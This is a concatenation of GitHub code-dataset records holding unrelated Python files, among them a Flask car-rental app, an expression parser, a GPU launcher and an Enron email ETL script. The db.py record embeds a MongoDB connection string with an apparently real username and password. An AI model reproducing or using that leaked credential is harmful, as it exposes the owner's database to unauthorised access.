given the coordinates and objective values\n#for obj_name, obj in obj_dict.items():\n# interp[obj_name] = scipy.interpolate.LinearNDInterpolator(coordinates, obj)\n# \n#fileObject = open('interpolator.pkl', 'wb')\n#\n#pickle.dump(interp, fileObject)\n#fileObject.close()\n\nos.system(\"dakota -i sfr_moo.in -o sfr.out > sft.stdout\")","repo_name":"ryanstwrt/SFR_Dakota_Interface","sub_path":"run_sfr_opt.py","file_name":"run_sfr_opt.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30807693807","text":"#!/usr/bin/env python\n\ndef binary_query(msg, default=True):\n '''\n Query the user with the yes/no question ``msg``. Return True if the response is yes, and\n return False if the response is no.\n '''\n if default == True:\n suffix = 'Y/n\\n'\n else:\n suffix = 'y/N\\n'\n response = input(msg + ' ' + suffix)\n if response.lower() == 'y' or response.lower() == 'yes':\n return True\n elif response.lower() == 'n' or response.lower() == 'no':\n return False\n # If the user response is not y/yes/n/no, call this function again, printing an error\n # message.\n else:\n binary(\"Invalid response. Please type yes or no.\", default=default)\n\ndef string_query(msg):\n '''\n Query the user with the question ''msg'', and return the string that the \n user enters in response.\n '''\n print(msg)\n s = input('>>> ')\n return s\n","repo_name":"meghanjwyatt/statsproject","sub_path":"loaddata/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12999078740","text":"import heapq\nfrom operator import mul\n\n\ndef get_calculate(number_list):\n smallest = heapq.nsmallest(2, number_list)\n biggest = heapq.nlargest(2, number_list)\n if mul(*smallest) > mul(*biggest):\n return sorted(smallest)\n else:\n return sorted(biggest)\n\n\nwith open('input.txt') as file:\n number_list = list(map(int, file.read().split()))\n\nwith open('output.txt', 'w') as file:\n file.write(' '.join(map(str, get_calculate(number_list))))\n","repo_name":"dimk00z/summer_yandex_algorithmic_course","sub_path":"Homework_2/G_Greatest_product_of_two_numbers/G_Greatest_product_of_two_numbers.py","file_name":"G_Greatest_product_of_two_numbers.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"32109107652","text":"from sys import stdin\n\nn, m = [int(x) for x in stdin.readline().split()]\nadj = [[] for _ in range(n+1)]\ndp = [0] * (n+1)\nvis = [0] * (n+1)\nfor i in range(n-1):\n x, y = [int(x) for x in stdin.readline().split()]\n adj[x].append(y)\n\ndef dfs(s, cnt):\n if vis[s] or s > n:\n return cnt\n vis[s] = 1\n dp[s] = cnt\n for i in adj[s]:\n dfs(i, cnt+1)\n\ndfs(1,0)\nans = [0] * (n+1)\nfor i in range(1, n+1):\n ans[dp[i]] += 1\ncnt = 0\n\nfor i in range(1, n+1):\n sav = dp[i] + m\n if sav <= n+1:\n cnt += ans[sav]\nprint(dp, cnt)","repo_name":"trungpro5398/Competitive-programming","sub_path":"CP problems/Big-O/Backtracking/Distance in Tree.py","file_name":"Distance in Tree.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22377338636","text":"from abc import ABC\nfrom typing import TYPE_CHECKING, Any, List, NewType\n\nif TYPE_CHECKING:\n from vkbottle.dispatch.views.abc import ABCView\n from vkbottle.dispatch.handlers.abc import ABCHandler\n\n\nMiddlewareResponse = NewType(\"MiddlewareResponse\", bool)\n\n\nclass BaseMiddleware(ABC):\n async def pre(self, event):\n ...\n\n async def post(\n self, event, view: \"ABCView\", handle_responses: List[Any], handlers: List[\"ABCHandler\"]\n ):\n ...\n\n def __repr__(self) -> str:\n return f\"<{self.__class__.__name__}>\"\n","repo_name":"matematica298/FirstBotForVK","sub_path":"venv/Lib/site-packages/vkbottle/dispatch/middlewares/abc.py","file_name":"abc.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3954405578","text":"import datetime\nimport random\n\nfrom flask import render_template, url_for, flash, redirect, request\nfrom rentalApp import app, bcrypt\nfrom rentalApp.forms import RegistrationForm, LoginForm, AddRentalForm, RentalForm, AddHours\nfrom rentalApp import con, login_manager\nfrom rentalApp.user import User, validate_user\nfrom flask_login import login_user, logout_user, current_user\nfrom datetime import date\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.get(user_id)\n\n\n@app.route(\"/\")\n@app.route(\"/home\") # Our main page for the app\ndef home():\n return render_template('home.html')\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\n@app.route(\"/rentals\")\ndef rentals():\n cursor = con.cursor(dictionary=True)\n cursor.execute(\"SELECT * FROM rental WHERE Status = 'available'\")\n data = cursor.fetchall()\n cursor.close()\n return render_template('rentals.html', title='Rentals', response=data)\n\n\n@app.route(\"/rentals/\", methods=[\"GET\", \"POST\"])\ndef rentCar(rentalid):\n form = RentalForm()\n if not current_user.is_authenticated:\n flash('You must make an account to rent!', \"danger\")\n return redirect(url_for('home'))\n\n if form.validate_on_submit():\n cursor = con.cursor(dictionary=True)\n cursor.execute(\"UPDATE rental SET Status = 'rented' WHERE RegNo = %s\", (str(rentalid),))\n con.commit()\n\n cursor.execute(\"SELECT * FROM rental WHERE RegNo = %s\", (str(rentalid),))\n result = cursor.fetchone()\n\n price = result[\"Price\"]\n coverage = form.insurance_type.data\n insurance_price = 0\n if coverage == \"partial\":\n insurance_price = price * 0.05 * int(form.days.data)\n else:\n insurance_price = price * 0.10 * int(form.days.data)\n\n cursor.execute(\"INSERT INTO insurance_plan (Price, Coverage) VALUES (%s,%s)\", (insurance_price, coverage))\n con.commit()\n\n cursor.execute(\"SELECT last_insert_id()\")\n plan_no = cursor.fetchone()[\"last_insert_id()\"]\n\n cursor.execute(\"SELECT * FROM agent\")\n agent_list = cursor.fetchall()\n agents = []\n for a in agent_list:\n agents.append(a[\"Agent_SSN\"])\n\n agent = random.choice(agents)\n\n cursor.execute(\"SELECT ID FROM customer WHERE Username = %s\", (current_user.get_id(),))\n cust = cursor.fetchone()[\"ID\"]\n\n cursor.execute(\"INSERT INTO insurance_transaction VALUES (%s,%s,%s);\", (int(cust), int(plan_no), int(agent)))\n con.commit()\n\n today = date.today()\n start_date = today.strftime(\"%Y-%m-%d\")\n end_date = today + datetime.timedelta(days=int(form.days.data))\n\n cursor.execute(\"INSERT INTO rents VALUES(%s,%s,%s,%s,%s)\",\n (int(cust), int(rentalid), float(price) * int(form.days.data), start_date, end_date))\n con.commit()\n\n cursor.close()\n flash('Successfully rented the car!', \"success\")\n return redirect(url_for('home'))\n\n cursor = con.cursor(dictionary=True)\n num = cursor.execute(\n \"SELECT Make, Model, Color, City, Address, Price FROM rental WHERE Status = 'available' and RegNo = %s\",\n (str(rentalid),))\n data = cursor.fetchone()\n cursor.close()\n if data is None:\n flash('No existing rental', 'danger')\n return redirect(url_for('rentals'))\n\n return render_template('individualrental.html', title='Rentals', response=data, regNo=rentalid, form=form)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n\n form = RegistrationForm()\n if form.validate_on_submit():\n hash_pw = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n\n cursor = con.cursor()\n account_query = \"INSERT INTO account VALUES (%s, %s)\"\n account_info = (str(form.username.data), hash_pw)\n cursor.execute(account_query, account_info)\n con.commit()\n\n cursor.execute(\"INSERT INTO customer (Username, Name) VALUES (%s, %s)\", (form.username.data, form.name.data))\n con.commit()\n cursor.close()\n\n flash('Account created successfully! You can now login any time!', 'success')\n return redirect(url_for('login'))\n\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n\n form = LoginForm()\n if form.validate_on_submit():\n user = User.get(str(form.username.data))\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n flash('Logged in successfully!', 'success')\n return redirect(url_for('home'))\n else:\n flash(\"Username or password doesn't match\", 'danger')\n\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n\n@app.route('/manage', methods=['GET', 'POST'])\ndef manage():\n form = AddHours()\n username = current_user.get_id()\n if current_user.is_authenticated:\n user = current_user.get(username)\n usertype = validate_user(username, user.password)\n else:\n flash(\"You do not have permissions for that.\", 'danger')\n return redirect(url_for('home'))\n\n if usertype != \"user\" and usertype != 401:\n if form.validate_on_submit():\n cursor = con.cursor(dictionary=True)\n cursor.execute(\"SELECT Hours FROM employee WHERE Username = %s\", (username,))\n hours = cursor.fetchone()['Hours']\n new_hours = hours + int(form.hours.data)\n\n cursor.execute(\"UPDATE employee SET Hours = %s WHERE Username = %s\", (new_hours, username))\n con.commit()\n cursor.close()\n flash(\"Hours successfully added!\", 'success')\n\n return render_template('manage.html', form=form)\n else:\n flash(\"You do not have permissions for that.\", 'danger')\n return redirect(url_for('home'))\n\n\n@app.route('/account')\ndef account():\n if not current_user.is_authenticated: # make sure user is logged in\n flash(\"You must log in first.\", 'danger')\n return redirect(url_for('login'))\n\n username = current_user.get_id()\n user = current_user.get(username)\n usertype = validate_user(username, user.password)\n\n cursor = con.cursor(dictionary=True)\n query = \"SELECT r.Model, r.Make, t.Price, t.Start_date, t.End_date\" \\\n \" FROM rents as t, rental as r, customer as c WHERE c.Username = %s\" \\\n \" and c.ID = t.Customer_id and r.RegNo = t.RegNo\"\n cursor.execute(query, (username,))\n rentals = cursor.fetchall()\n cursor.close()\n\n if usertype != \"user\" and usertype != 401: # display for employees\n cursor = con.cursor(dictionary=True)\n cursor.execute(\"SELECT Hours FROM employee WHERE Username = %s\", (username,))\n result = cursor.fetchone()\n cursor.close()\n hours = result[\"Hours\"]\n return render_template('account.html', hours=hours, rentals=rentals)\n\n return render_template('account.html', rentals=rentals)\n\n\n@app.route('/addrental', methods=['GET', 'POST'])\ndef addrental():\n username = current_user.get_id()\n if current_user.is_authenticated:\n user = current_user.get(username)\n usertype = validate_user(username, user.password)\n else:\n flash(\"You do not have permissions for that.\", 'danger')\n return redirect(url_for('home'))\n\n if usertype != \"user\":\n form = AddRentalForm()\n if form.validate_on_submit():\n print(\"rental submitted\")\n cursor = con.cursor(dictionary=True)\n query = \"INSERT INTO rental(Color, Status, Make, Model, City, Address, Price)\" \\\n \"values(%s,%s,%s,%s,%s,%s,%s)\"\n location = form.location.data.split(', ')\n rental_info = (form.color.data, \"available\", form.make.data,\n form.model.data, location[1], location[0], float(form.price.data))\n cursor.execute(query, rental_info)\n con.commit()\n cursor.close()\n\n flash('Rental added successfully!', 'success')\n return redirect(url_for('manage'))\n\n return render_template('addrental.html', form=form)\n else:\n flash(\"You do not have permissions for that.\", 'danger')\n return redirect(url_for('home'))\n","repo_name":"Evyn710/car-rental-webapp","sub_path":"CPSC471Project/WebApp/rentalApp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26434859317","text":"import abc\nimport typing\n\nfrom .exception import *\nfrom .token import *\nfrom .lexer import *\nfrom .node import *\n\n\n__all__ = [\n \"Parser\",\n \"ParamParser\",\n \"ParamOptionsParser\",\n \"ParamSequenceParser\",\n \"parse\",\n]\n\n\nclass Parser(abc.ABC):\n \"\"\"\n Base class for all parser implementations, such as a :class:`ParamSequenceParser`. A parser takes the stream of\n tokens produced by the lexer and returns a meaningful representation of the data.\n \"\"\"\n\n def __init__(self, lexer: Lexer, offset: int):\n \"\"\"\n Init method for the class.\n\n :param lexer: The lexer that produces the tokens for the parser.\n :param offset: The offset to calculate absolute token position.\n \"\"\"\n self._lexer = lexer\n self._offset = offset\n\n @abc.abstractmethod\n def parse(self) -> list:\n \"\"\"\n Parses the stream of tokens generated by the lexer and returns a meaningful representation of the data as a\n list. Depending on the type of parser, this list might contain strings or might contain nodes.\n\n :raise ParserSyntaxException: The exception raised if the syntax of the expression is invalid.\n :return: The parsed strings or nodes.\n \"\"\"\n pass\n\n def eat(self, token_types: typing.Optional[typing.List[str]]) -> Token:\n \"\"\"\n Consumes the next token produced by the lexer. If a list of valid token types is given, this method will throw\n a :class:`.exception.ParserSyntaxException` if the produced token's type is not within the list.\n\n :param token_types: The list of valid token types.\n :raise ParserSyntaxException: The exception raised if the produced token is not within the allowed types.\n :return: The next token produced by the lexer.\n \"\"\"\n token = self._lexer.get_next_token()\n\n if token_types and token.token_type not in token_types:\n self.raise_unexpected_token(token)\n\n return token\n\n def raise_unexpected_token(self, token: Token):\n \"\"\"\n Raises a :class:`.exception.ParserSyntaxException` for the given token.\n\n :param token: The token to raise an exception for.\n :raise ParserSyntaxException: The exception for the given token.\n :return:\n \"\"\"\n raise ParserSyntaxException(\n \"Unexpected token '{}' at position '{}'\".format(\n token.token_type,\n token.token_position + self._offset,\n )\n )\n\n\nclass ParamParser(Parser):\n \"\"\"\n Parses tokens of a param expression. That is an expression that looks as follows:\n `\"name:type:option1,option2,option3\"`\n \"\"\"\n\n def parse(self) -> typing.List[typing.Union[str, list]]:\n \"\"\"\n Parses the tokens generated by the lexer and returns a list containing the param configuration of the\n expression. The first element of the list is the name of the param as a string. The second element is the type\n of the param as a string. The type may be :data:`None`. The third param is a list of strings, where each element\n represents the option's value.\n\n :raise ParserSyntaxException: The exception raised if the syntax of the expression is invalid.\n :return: The parsed strings and lists representing the expression.\n \"\"\"\n param_name_token = self.eat([Token.TYPE_SEQUENCE])\n param_name = param_name_token.token_value\n self.eat([Token.TYPE_EOF, Token.TYPE_COLON])\n\n param_type_token = self.eat([Token.TYPE_EOF, Token.TYPE_SEQUENCE])\n param_type = param_type_token.token_value\n self.eat([Token.TYPE_EOF, Token.TYPE_COLON])\n\n param_options_token = self.eat([Token.TYPE_EOF, Token.TYPE_SEQUENCE])\n param_options = param_options_token.token_value\n self.eat([Token.TYPE_EOF])\n\n if param_options_token.token_type == Token.TYPE_SEQUENCE:\n param_options_parser = ParamOptionsParser(\n ParamOptionsLexer(param_options_token.token_raw_value),\n param_options_token.token_position + self._offset,\n )\n param_options = param_options_parser.parse()\n\n return [\n param_name,\n param_type,\n param_options,\n ]\n\n\nclass ParamOptionsParser(Parser):\n \"\"\"\n Parses tokens of a param options expression. That is an expression that looks as follows:\n `\"option1,option2,option3\"`\n \"\"\"\n\n def parse(self) -> typing.List[str]:\n \"\"\"\n Parses the tokens generated by the lexer and returns a list of strings, where each string is an option value.\n The order of the list equals the order of option values within the expression.\n\n :raise ParserSyntaxException: The exception raised if the syntax of the expression is invalid.\n :return: The parsed strings representing the expression.\n \"\"\"\n options_list = []\n current_token = self.eat([Token.TYPE_EOF, Token.TYPE_SEQUENCE])\n\n while current_token.token_type != Token.TYPE_EOF:\n options_list.append(current_token.token_value)\n\n self.eat([Token.TYPE_EOF, Token.TYPE_COMMA])\n current_token = self.eat([Token.TYPE_EOF, Token.TYPE_SEQUENCE])\n\n return options_list\n\n\nclass ParamSequenceParser(Parser):\n \"\"\"\n Parses tokens of a param sequence expression. That is an expression that looks as follows:\n `\"random-sequence{name:type:option1,option2,option3}other-random-sequence\"`\n \"\"\"\n\n def parse(self) -> typing.List[Node]:\n \"\"\"\n Parses the tokens generated by the lexer and returns a list of nodes representing the structure\n of the expression. A node may be a :class:`.node.SequenceNode`, which represents a sequence of text without any\n meaning, or may be a :class:`.node.ParamNode`, which represent a parameter with a name, optional type and some\n options.\n\n :raise ParserSyntaxException: The exception raised if the syntax of the expression is invalid.\n :return: The parsed nodes representing the expression.\n \"\"\"\n node_list = []\n current_token = self.eat(\n [Token.TYPE_EOF, Token.TYPE_SEQUENCE, Token.TYPE_LC_BRACKET]\n )\n\n while current_token.token_type != Token.TYPE_EOF:\n current_token_type = current_token.token_type\n\n if current_token_type == Token.TYPE_SEQUENCE:\n node_list.append(SequenceNode(current_token.token_value))\n\n elif current_token_type == Token.TYPE_LC_BRACKET:\n param_sequence_token = self.eat([Token.TYPE_SEQUENCE])\n param_sequence_parser = ParamParser(\n ParamLexer(param_sequence_token.token_raw_value),\n param_sequence_token.token_position + self._offset,\n )\n param_sequence = param_sequence_parser.parse()\n\n node_list.append(\n ParamNode(param_sequence[0], param_sequence[1], param_sequence[2])\n )\n\n self.eat([Token.TYPE_RC_BRACKET])\n\n current_token = self.eat(\n [Token.TYPE_EOF, Token.TYPE_SEQUENCE, Token.TYPE_LC_BRACKET]\n )\n\n return node_list\n\n\ndef parse(expression: str) -> typing.List[Node]:\n \"\"\"\n Parses the given expression and returns a list of :class:`.node.SequenceNode` and :class:`.node.ParamNode`\n instances. The expected expression looks as follows:\n `\"random-sequence{name:type:option1,option2,option3}other-random-sequence\"`\n\n :raise ParserSyntaxException: The exception raised if the syntax of the expression is invalid.\n :return: The parsed nodes representing the expression.\n \"\"\"\n parser = ParamSequenceParser(ParamSequenceLexer(expression), 0)\n return parser.parse()\n","repo_name":"anexia/python-param-parser","sub_path":"param_parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17907900945","text":"import torch\nimport sys\nimport subprocess\n\nargslist = list(sys.argv)[1:]\nworld_size = torch.cuda.device_count()\ndevice_ids = None\nif '--device-ids' in argslist: # Manually specified GPU IDs\n device_ids = argslist[argslist.index('--device-ids') + 1].strip().split(',')\n world_size = len(device_ids)\n # Remove GPU IDs since these are not for the training script\n argslist.pop(argslist.index('--device-ids') + 1)\n argslist.pop(argslist.index('--device-ids'))\n\nif '--world-size' in argslist:\n argslist[argslist.index('--world-size') + 1] = str(world_size)\nelse:\n argslist.append('--world-size')\n argslist.append(str(world_size))\n\nworkers = []\n\nfor i in range(world_size):\n if '--rank' in argslist:\n argslist[argslist.index('--rank') + 1] = str(i)\n else:\n argslist.append('--rank')\n argslist.append(str(i))\n if '--gpu-rank' in argslist:\n if device_ids:\n argslist[argslist.index('--gpu-rank') + 1] = str(device_ids[i])\n else:\n argslist[argslist.index('--gpu-rank') + 1] = str(i)\n else:\n argslist.append('--gpu-rank')\n argslist.append(str(i))\n stdout = None if i == 0 else open(\"GPU_\" + str(i) + \".log\", \"w\")\n print(argslist)\n p = subprocess.Popen([str(sys.executable)] + argslist, stdout=stdout, stderr=stdout)\n workers.append(p)\n\nfor p in workers:\n p.wait()\n if p.returncode != 0:\n raise subprocess.CalledProcessError(returncode=p.returncode,\n cmd=p.args)\n","repo_name":"msr-fiddle/synergy","sub_path":"simulator/deployment/models/deepspeech.pytorch/multiproc.py","file_name":"multiproc.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"34"} +{"seq_id":"6255819025","text":"from pymongo import MongoClient\n\nmongodb = \"mongodb+srv://Gosha:CSWN23zgHAd81lEh@cluster0.d4qarje.mongodb.net/?retryWrites=true&w=majority\"\nclient = MongoClient(mongodb)\ndatabase = client.get_database(\"default\")\nusers_collection = database.get_collection(\"users\")\n\nall_users = users_collection.find({})\nfor user in all_users:\n print(user)","repo_name":"PavloMelnikovich/Game_bot","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32543233300","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport csv\nimport json\nimport uuid\nimport shutil\nimport gzip\nfrom collections import Counter\nfrom datetime import datetime\n\n# Stats Counters\nsender_counter = Counter()\nreceiver_counter = Counter()\nconnections_counter = Counter() # Counter for the connection extension for Neo4j\nrow_number = 0\n\n\ndef write_json(email_, row_number_, file_input_):\n \"\"\" Write the email dictionary into a json file.\n\n :param email_: dictionary of one row\n :param row_number_: the position of the row in the file\n :param file_input_: The path name of the source file\n\n :return:null\n \"\"\"\n filename = file_input_.split('/')[-1]\n json_file = './processed/{}-{}.json'.format(filename, row_number_)\n\n with open(json_file, 'w') as f:\n json.dump(email_, f, indent=4, separators=(',', ': '))\n # Added for POSIX compatibility\n f.write('\\n')\n f.close()\n\n\ndef archive_file(input_file_):\n \"\"\"The function archive the source file\n\n :param input_file_: The path name of the source file\n :return:null\n \"\"\"\n filename = input_file_.split('/')[-1]\n archive_path = './archive/'\n\n current_data = datetime.now()\n current_data = current_data.strftime(\"%Y%m%d\")\n archived_file = '{}{}-processed-{}.gz'.format(archive_path, filename, current_data)\n\n with open(input_file, 'rb') as f_in, gzip.open(archived_file, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n print(\"File Archived as {}\".format(archived_file))\n\n\ndef statistics_updater(email_):\n \"\"\"The function extract from the email dictionary, the sender and receiver(s)\n and update the related counters.\n :param email_:dictionary of one row\n :return:\n \"\"\"\n global row_number\n row_number += 1\n\n sender_counter[email_['sender']] += 1\n\n for receiver in email_['recipients']:\n receiver_counter[receiver] += 1\n\n\ndef network_updater(email_):\n \"\"\"The function extract from the email dictionary, the sender and receiver(s)\n and update the related counters.\n :param email_:dictionary of one row\n :return:\n \"\"\"\n for receiver in email_['recipients']:\n connection= \"{}-{}\".format(email_['sender'],receiver)\n print(connection)\n connections_counter[connection] += 1\n\ndef statistics_final(input_file_):\n \"\"\" The function consolidate the counters for the received and send emails\n and dump all into the -stat.cvs file.\n :param input_file_: The path name of the source file\n :return:\n \"\"\"\n filename = input_file_.split('/')[-1]\n filename = './{}-stats.csv'.format(filename)\n file_stats = open(filename, 'w')\n file_stats.write('User, Received_Emails, Sended_Emails\\n')\n list_users = list(set(sender_counter.keys()))\n list_users.sort()\n for user in list_users:\n file_stats.write('\"{}\",{},{}\\n'.format(user, receiver_counter.get(user, 0), sender_counter.get(user, 0)))\n file_stats.close()\n print(\"File statistics as {}\".format(filename))\n\n\ndef check_file():\n \"\"\"The function test the application input information and the existence of the source file\n\n :return:\n \"\"\"\n # Check the command line argument\n if len(sys.argv) != 2:\n print(\"\\n Sorry, not a valid format\")\n print(\"\\nPlease, use the format, as in the example below:\")\n print(\"python parse-daily-enron-file.py source/enron-event-history-20180202.csv\")\n exit()\n input_file_ = str(sys.argv[1])\n # check if file exist\n if not os.path.isfile(input_file_):\n print(\"Sorry, file not found\")\n print(\"File {} do not Exist please check the file path\".format(input_file_))\n exit()\n return input_file_\n\n\nif __name__ == \"__main__\":\n\n input_file = check_file()\n\n row_number = 0\n with open(input_file) as csv_file:\n readCSV = csv.reader(csv_file, delimiter=',')\n for row in readCSV:\n row_number += 1\n email = dict()\n email['timestamp_iso'] = datetime.utcfromtimestamp(int(row[0])/1000).isoformat()\n email['unique_id'] = str(uuid.uuid4())\n email['message identifier'] = row[1]\n email['sender'] = row[2].lower()\n email['recipients'] = row[3].lower().split('|')\n\n dict_recipients = {'name': 'number_of_recipients', 'value': len(row[3].split('|'))}\n email['attributes'] = [dict_recipients, ]\n\n # it is always empty but we keep for consistency\n email[\"topic\"] = row[4]\n\n # it is always mail but we keep for consistency\n email[\"email\"] = row[5]\n\n write_json(email, row_number, input_file)\n\n statistics_updater(email)\n network_updater(email)\n\n csv_file.close()\n\n archive_file(input_file)\n\n statistics_final(input_file)\n print(connections_counter)\n","repo_name":"EnzoCalogero/personal_note","sub_path":"etl/parse-daily-enron-file.py","file_name":"parse-daily-enron-file.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73856037217","text":"from TorchSUL import Model as M \nimport torch\nimport torch.nn as nn \nimport torch.nn.functional as F \nfrom torch.nn.parameter import Parameter\nimport torch.nn.init as init \n\nclass Zero(M.Model):\n\tdef initialize(self, stride):\n\t\tself.stride = stride\n\tdef forward(self, x):\n\t\tif self.stride==1:\n\t\t\treturn x * 0\n\t\telse:\n\t\t\tx = x[:,:, ::self.stride, ::self.stride] * 0\n\t\t\treturn x \n\nclass MP33(M.Model):\n\tdef initialize(self, stride, bn=False):\n\t\tself.bn = bn \n\t\tself.p = M.MaxPool2D(3, stride)\n\t\tif self.bn:\n\t\t\tself.batch_norm = M.BatchNorm()\n\tdef forward(self, x):\n\t\t# print(x)\n\t\tx = self.p(x)\n\t\tif self.bn:\n\t\t\tx = self.batch_norm(x)\n\t\treturn x\n\nclass AP33(M.Model):\n\tdef initialize(self, stride, bn=False):\n\t\tself.bn = bn \n\t\tself.p = M.AvgPool2D(3, stride)\n\t\tif self.bn:\n\t\t\tself.batch_norm = M.BatchNorm()\n\tdef forward(self, x):\n\t\tx = self.p(x)\n\t\tif self.bn:\n\t\t\tx = self.batch_norm(x)\n\t\treturn x\n\nclass Skip(M.Model):\n\tdef initialize(self, out, stride):\n\t\tself.stride = stride\n\t\tif stride!=1:\n\t\t\tself.rd = FactReduce(out)\n\tdef forward(self, x):\n\t\tif self.stride==1:\n\t\t\treturn x \n\t\telse:\n\t\t\treturn self.rd(x)\n\nclass SPConv33(M.Model):\n\tdef initialize(self, out, stride):\n\t\tself.c1 = M.DWConvLayer(3, 1, stride=stride, usebias=False)\n\t\tself.c2 = M.ConvLayer(1, out, usebias=False, batch_norm=True)\n\tdef forward(self, x):\n\t\tx = M.activation(x, M.PARAM_RELU)\n\t\tx = self.c1(x)\n\t\tx = self.c2(x)\n\t\treturn x \n\nclass SPConv55(M.Model):\n\tdef initialize(self, out, stride):\n\t\tself.c1 = M.DWConvLayer(5, 1, stride=stride, usebias=False)\n\t\tself.c2 = M.ConvLayer(1, out, usebias=False, batch_norm=True)\n\tdef forward(self, x):\n\t\tx = M.activation(x, M.PARAM_RELU)\n\t\tx = self.c1(x)\n\t\tx = self.c2(x)\n\t\treturn x \n\nclass DilConv33(M.Model):\n\tdef initialize(self, out, stride):\n\t\tself.c1 = M.ConvLayer(3, out, stride=stride, dilation_rate=2, batch_norm=True, usebias=False)\n\tdef forward(self, x):\n\t\tx = M.activation(x, M.PARAM_RELU)\n\t\tx = self.c1(x)\n\t\treturn x \n\nclass DilConv55(M.Model):\n\tdef initialize(self, out, stride):\n\t\tself.c1 = M.ConvLayer(5, out, stride=stride, dilation_rate=2, batch_norm=True, usebias=False)\n\tdef forward(self, x):\n\t\tx = M.activation(x, M.PARAM_RELU)\n\t\tx = self.c1(x)\n\t\treturn x \n\n# class ASPP(M.Model):\n# \tdef initialize(self, out, dilation):\n# \t\tself.c11 = M.ConvLayer(1, out, usebias=False, batch_norm=True)\n# \t\tself.c33 = M.ConvLayer(3, out, usebias=False, batch_norm=True, dilation_rate=dilation)\n# \t\tself.convp = M.ConvLayer(1, out, usebias=False, batch_norm=True)\n# \t\tself.concat_conv = M.ConvLayer(1, out, usebias=False, batch_norm=True)\n# \t\tself.GP = M.GlobalAvgPool()\n# \tdef forward(self, x):\n# \t\tx11 = self.c11(x)\n# \t\tx33 = self.c33(x)\n# \t\tpool = self.GP(x)\n# \t\tup = tf.ones_like(x) * pool \n# \t\tconcat = tf.concat([x11, x33, up], axis=-1)\n# \t\tout = self.concat_conv(concat)\n# \t\treturn out \n\nclass FuseDown(M.Model):\n\tdef initialize(self, steps, inp, o):\n\t\tself.mods = nn.ModuleList()\n\t\tfor i in range(steps):\n\t\t\tif i==(steps-1):\n\t\t\t\tself.mods.append(M.ConvLayer(3, o, stride=2, batch_norm=True, usebias=False))\n\t\t\telse:\n\t\t\t\tself.mods.append(M.ConvLayer(3, o, stride=2, activation=M.PARAM_RELU, batch_norm=True, usebias=False))\n\tdef forward(self, x):\n\t\tfor m in self.mods:\n\t\t\tx = m(x)\n\t\treturn x \n\nclass FactReduce(M.Model):\n\tdef initialize(self, out):\n\t\tself.c1 = M.ConvLayer(1, out//2, stride=2, usebias=False)\n\t\tself.c2 = M.ConvLayer(1, out//2, stride=2, usebias=False)\n\t\tself.bn = M.BatchNorm()\n\tdef forward(self, x):\n\t\tx = M.activation(x, M.PARAM_RELU)\n\t\tx1 = self.c1(x)\n\t\tx2 = self.c2(x[:,1:,1:,:])\n\t\tx = torch.cat([x1, x2], axis=1)\n\t\tx = self.bn(x)\n\t\treturn x \n\nclass FactIncrease(M.Model):\n\tdef initialize(self, out):\n\t\tself.c1 = M.ConvLayer(1, out, usebias=False, batch_norm=True)\n\tdef forward(self, x):\n\t\tx = F.interpolate(x, size=None, scale_factor=2, mode='bilinear', align_corners=False)\n\t\tx = M.activation(x, M.PARAM_RELU)\n\t\tx = self.c1(x)\n\t\treturn x \n\nclass MixedOp(M.Model):\n\tdef initialize(self, out, stride):\n\t\tops = nn.ModuleList()\n\t\tops.append(Zero(stride))\n\t\tops.append(MP33(stride, True))\n\t\tops.append(AP33(stride, True))\n\t\tops.append(Skip(out, stride))\n\t\tops.append(SPConv33(out, stride))\n\t\tops.append(SPConv55(out, stride))\n\t\tops.append(DilConv33(out, stride))\n\t\tops.append(DilConv55(out, stride))\n\t\tself.ops = ops \n\tdef forward(self, x, weights):\n\t\t# print(x.shape)\n\t\tres = sum(w*op(x) for w,op in zip(weights,self.ops))\n\t\t# print(res.shape)\n\t\treturn res \n\nclass CellBuilder(M.Model):\n\tdef initialize(self, step, multiplier, c):\n\t\tself.multiplier = multiplier\n\t\tself.step = step\n\n\t\tself._ops = nn.ModuleList()\n\t\tself.step = step\n\t\tfor i in range(step):\n\t\t\tfor j in range(1+i):\n\t\t\t\tself._ops.append(MixedOp(c, 1))\n\t\tself.conv_last = M.ConvLayer(1, c, activation=M.PARAM_RELU, batch_norm=True, usebias=False)\n\n\tdef forward(self, x, w):\n\t\tstates = [x]\n\t\toffset = 0\n\t\tfor 